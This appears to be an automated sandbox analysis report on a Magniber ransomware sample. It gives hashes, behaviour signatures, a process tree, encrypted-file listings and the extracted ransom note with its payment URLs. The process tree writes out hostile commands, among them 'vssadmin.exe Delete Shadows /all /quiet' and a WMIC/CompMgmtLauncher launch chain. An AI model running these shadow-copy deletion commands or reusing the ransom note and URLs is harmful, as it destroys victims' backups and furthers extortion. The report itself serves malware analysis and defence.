Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-06-2021 14:07

General

  • Target

    5.exe

  • Size

    21KB

  • MD5

    9f4a400b5500df75cc0ba3fc2cf9d958

  • SHA1

    b1c4fbdce52f495c548d0de5e62e2996f6e6d31f

  • SHA256

    8474b7fd46e898991cbd0338ebd345bd3fd63a118168bbc662b52dff25e033cf

  • SHA512

    ddd55d6a17fb83b664a1cf1a2e50769a864b3b0178e24ea5563dfc056853ae67ff97e89bc5981b5f0869175950d2a6dccde161a0239fb643a93bed0099ce3575

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://66a814088e14c040feefmsoxzs.ndkeblzjnpqgpo5o.onion/efmsoxzs Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://66a814088e14c040feefmsoxzs.lieedge.casa/efmsoxzs http://66a814088e14c040feefmsoxzs.lognear.xyz/efmsoxzs http://66a814088e14c040feefmsoxzs.bejoin.space/efmsoxzs http://66a814088e14c040feefmsoxzs.wonride.site/efmsoxzs Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://66a814088e14c040feefmsoxzs.ndkeblzjnpqgpo5o.onion/efmsoxzs

http://66a814088e14c040feefmsoxzs.lieedge.casa/efmsoxzs

http://66a814088e14c040feefmsoxzs.lognear.xyz/efmsoxzs

http://66a814088e14c040feefmsoxzs.bejoin.space/efmsoxzs

http://66a814088e14c040feefmsoxzs.wonride.site/efmsoxzs

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1204
    • C:\Users\Admin\AppData\Local\Temp\5.exe
      "C:\Users\Admin\AppData\Local\Temp\5.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:788
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1056
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1748
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            4⤵
              PID:700
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
      • C:\Windows\system32\Dwm.exe
        "C:\Windows\system32\Dwm.exe"
        1⤵
        • Modifies extensions of user files
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1172
        • C:\Windows\system32\notepad.exe
          notepad.exe C:\Users\Public\readme.txt
          2⤵
          • Opens file in notepad (likely ransom note)
          PID:1244
        • C:\Windows\system32\cmd.exe
          cmd /c "start http://66a814088e14c040feefmsoxzs.lieedge.casa/efmsoxzs^&1^&39743288^&74^&337^&12"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:616
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://66a814088e14c040feefmsoxzs.lieedge.casa/efmsoxzs&1&39743288&74&337&12
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1880
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1880 CREDAT:275457 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1120
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:760
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:284
      • C:\Windows\system32\taskhost.exe
        "taskhost.exe"
        1⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:824
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1604
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2244
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2392
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:2096
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
              PID:2232
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2400
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:2084
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2284
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:2408
              • C:\Windows\system32\cmd.exe
                cmd /c CompMgmtLauncher.exe
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:2068
                • C:\Windows\system32\CompMgmtLauncher.exe
                  CompMgmtLauncher.exe
                  2⤵
                    PID:2260
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:2416
                  • C:\Windows\system32\cmd.exe
                    cmd /c CompMgmtLauncher.exe
                    1⤵
                    • Process spawned unexpected child process
                    • Suspicious use of WriteProcessMemory
                    PID:2060
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      2⤵
                        PID:2208
                        • C:\Windows\system32\wbem\wmic.exe
                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                          3⤵
                            PID:2764
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2624
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2640
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2672
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2664
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                          PID:2752
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          1⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:3012

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\54V921K5.txt

                          MD5

                          73a60228e301609d92f8857dd5b23463

                          SHA1

                          49d505c24328aec8f32794f9205df92ff99f51b9

                          SHA256

                          ccc0a85034090ae512c65136ef928df9d1b2f76cfd9b0fa4cf4116f19b39125c

                          SHA512

                          45e2dc429a445c8c5e18de7e978ee138be66b16a654a67cdbad58e770e22270a42dd30dfe2c01f4a0fc0ef199b7d311e32235a1bbd881e1c5d407f4b8ae8c36a

                        • C:\Users\Admin\Desktop\AddProtect.php.efmsoxzs

                          MD5

                          7b596930561ec6dd144444e9575e7b6b

                          SHA1

                          3c308ec085d842e587ec87fcf7aac2beb134c9bf

                          SHA256

                          d373b94f18abd9f6cc7f6d4608e6624bb95c0eab2dbdd774b84ad56d55609484

                          SHA512

                          a8c9cc52a847a06fab41427394db75ecaee9d90611a095d016e2203a3b2edf5e7b93c7ce4dfa5658e93c39ccc0afe877583a7ec92495913b32222031481ec44d

                        • C:\Users\Admin\Desktop\EnableSkip.pptx.efmsoxzs

                          MD5

                          051a4b6084959ff6d96110270759e1b9

                          SHA1

                          7bab5fad2266a3a80286bad1167b6d6639e6258c

                          SHA256

                          26ddc194739c7f4dd182c95aa76b40c4e7dc2c00f085d5965d3f1054aa36cff3

                          SHA512

                          d827947c70814f8d9e720df7a0c0d9f7b4b6ad6e7368150f40385035e0c49d751d2339435868bc9bf5c04693ff3a1cf71a02ae6a1b6a00966271f484f3ee5328

                        • C:\Users\Admin\Desktop\ExitSync.jfif.efmsoxzs

                          MD5

                          73535cd6bd53498ce64f7623b9c977c7

                          SHA1

                          5d0933e3ca4011ddd6b5813f933a59fdd1e02cf8

                          SHA256

                          3f47b47b4b94e58fe39d0eb9d52aaee73477060063fd468e6934386fb0ac31a4

                          SHA512

                          672b9fe342d3167314642c1798506449f00630ecb5fae13d6447462433e458a073c3d860334e14173fe518be8618109c4573e86f05c950d36ace11b8c43ad888

                        • C:\Users\Admin\Desktop\GrantDisconnect.mid.efmsoxzs

                          MD5

                          e81a3344b573c2bfea224c7727967d99

                          SHA1

                          a54ee59668a7b444c0a051350a59cc2058579f54

                          SHA256

                          2d612bb6cbe81497cd3f650281bcacd347ea3a57fde37d02366b7be2332365d7

                          SHA512

                          d89b56395a756ac0ebe988a8348487e46223b332ba27e64b23240ce1b672970ec2782959893e98cf0aeaa527b7a885ba8a04205354b09de752aa00623d2bf7db

                        • C:\Users\Admin\Desktop\GrantOut.emf.efmsoxzs

                          MD5

                          0b62d3109baf2ec60724db6e76580c55

                          SHA1

                          79dcbf95894c0b74c5c1dd56fde2564412294443

                          SHA256

                          a9e68e5608959b5ebb092d9a7b638b8052f6c90dfb212133b5df23baabe8c99e

                          SHA512

                          9b980bba28da438e51cdf8f176c342c4915801c305cd408f797cd069cadd97b0bfc0f361d6dee4cc6213298896c0eb95668bc61b375ad356bcb6e5e5d1367e23

                        • C:\Users\Admin\Desktop\MeasureDisable.dwg.efmsoxzs

                          MD5

                          a63774088c05d79267c5911e5b0135e6

                          SHA1

                          62b104bcac6da8ac535aa0edb40edf228ce75a81

                          SHA256

                          7e77e566de991c6548160af08ce209eebe9ca243a96ccf0ddc36ca2afe69479b

                          SHA512

                          c87052d40bab54c3191fc63a754471573b662c7ef18c60f027807f9da6b8b83f100883c5ed45f1b1b1ba3a8623824a05a2ba8af0ef3db3a98e2c382edebeefdc

                        • C:\Users\Admin\Desktop\RequestDisconnect.iso.efmsoxzs

                          MD5

                          2305591290487c4c8c634add5a5adfee

                          SHA1

                          3a8db6ceb8c9e6ef75a79fc848127d34457e9eb8

                          SHA256

                          934e2228a5e273edff44c0c52fef86c13ae5f7345ce18d3f0a431c9b8c1d78e3

                          SHA512

                          b99ab5bba5f6afb4df2fe11d12a3232224fa94143e968cb0c5101de70d975544f11a696ae2b25d1ca025bb615fe5541feb4b137a082e4374c7c4d57ce92510a5

                        • C:\Users\Admin\Desktop\RequestSwitch.pptx.efmsoxzs

                          MD5

                          db777e1e403538c06743ab2e6d44f626

                          SHA1

                          80c96b7f9734db313d25ad9daf59c51883f0db50

                          SHA256

                          4698c1ae17e75aa2c9c7ea4099b00f5074c2bb1ac8c3d1c1e1472318c8e3a610

                          SHA512

                          055a5ba58d5470bf5d8c85024f90f8b5c8aa658d0fac077344726951a98df618356772fbba85226959054e3e99cc40dac840ce983aac4e4c3bca2d7cb6fc697a

                        • C:\Users\Admin\Desktop\RevokeOptimize.jpg.efmsoxzs

                          MD5

                          b10157968621b8f33b242c848a3094ea

                          SHA1

                          f034196337cd5e48d73e302782f1864076d32656

                          SHA256

                          e3dfbce6430fb5631e803fcb04f2319259c490d17793bddfe065ab60c5ec98b9

                          SHA512

                          a4adfe23c69c241a6145df9a2632d60497b4ed85eba0eafe147fb1c8a707c55734d077c8619d048007c0fecf2f111cb7904f75524e492fdfff4052f350a387b6

                        • C:\Users\Admin\Desktop\readme.txt

                          MD5

                          3612639b25a98e835d973c1a74ab90d0

                          SHA1

                          08cd4dbccff7d8d9601800e69f04dae06a744b57

                          SHA256

                          0121127ab621449f2a6b91db46d6769ad693504adc7c14e6681d9aabae1db191

                          SHA512

                          15eb20735ad5d7914a686f17a09a802fb89d263fb250b260f94953fe2b55e3d74c6920103b26464937ab7698c4ee0437512e1a300c23113ff2fbab0dd743e47d

                        • C:\Users\Public\readme.txt

                          MD5

                          3612639b25a98e835d973c1a74ab90d0

                          SHA1

                          08cd4dbccff7d8d9601800e69f04dae06a744b57

                          SHA256

                          0121127ab621449f2a6b91db46d6769ad693504adc7c14e6681d9aabae1db191

                          SHA512

                          15eb20735ad5d7914a686f17a09a802fb89d263fb250b260f94953fe2b55e3d74c6920103b26464937ab7698c4ee0437512e1a300c23113ff2fbab0dd743e47d

                        • memory/284-140-0x0000000000000000-mapping.dmp

                        • memory/616-138-0x0000000000000000-mapping.dmp

                        • memory/700-151-0x0000000000000000-mapping.dmp

                        • memory/760-139-0x0000000000000000-mapping.dmp

                        • memory/788-90-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-88-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-94-0x0000000001D20000-0x0000000001D21000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-93-0x0000000001D10000-0x0000000001D11000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-92-0x0000000001D00000-0x0000000001D01000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-62-0x00000000000E0000-0x00000000000E1000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-89-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-95-0x0000000001D30000-0x0000000001D31000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-65-0x0000000000210000-0x0000000000211000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-61-0x0000000000020000-0x0000000000025000-memory.dmp

                          Filesize

                          20KB

                        • memory/788-64-0x0000000000100000-0x0000000000101000-memory.dmp

                          Filesize

                          4KB

                        • memory/788-63-0x00000000000F0000-0x00000000000F1000-memory.dmp

                          Filesize

                          4KB

                        • memory/824-142-0x0000000000000000-mapping.dmp

                        • memory/1056-148-0x0000000000000000-mapping.dmp

                        • memory/1104-106-0x0000000001BC0000-0x0000000001BC4000-memory.dmp

                          Filesize

                          16KB

                        • memory/1120-153-0x0000000075551000-0x0000000075553000-memory.dmp

                          Filesize

                          8KB

                        • memory/1120-152-0x0000000000000000-mapping.dmp

                        • memory/1204-60-0x00000000029C0000-0x00000000029D0000-memory.dmp

                          Filesize

                          64KB

                        • memory/1244-96-0x0000000000000000-mapping.dmp

                        • memory/1244-126-0x000007FEFBF11000-0x000007FEFBF13000-memory.dmp

                          Filesize

                          8KB

                        • memory/1596-147-0x0000000000000000-mapping.dmp

                        • memory/1604-146-0x0000000000000000-mapping.dmp

                        • memory/1624-144-0x0000000000000000-mapping.dmp

                        • memory/1628-150-0x0000000000000000-mapping.dmp

                        • memory/1748-149-0x0000000000000000-mapping.dmp

                        • memory/1880-143-0x0000000000000000-mapping.dmp

                        • memory/2208-154-0x0000000000000000-mapping.dmp

                        • memory/2232-155-0x0000000000000000-mapping.dmp

                        • memory/2244-156-0x0000000000000000-mapping.dmp

                        • memory/2260-157-0x0000000000000000-mapping.dmp

                        • memory/2284-159-0x0000000000000000-mapping.dmp

                        • memory/2392-165-0x0000000000000000-mapping.dmp

                        • memory/2400-164-0x0000000000000000-mapping.dmp

                        • memory/2408-163-0x0000000000000000-mapping.dmp

                        • memory/2416-166-0x0000000000000000-mapping.dmp

                        • memory/2764-168-0x0000000000000000-mapping.dmp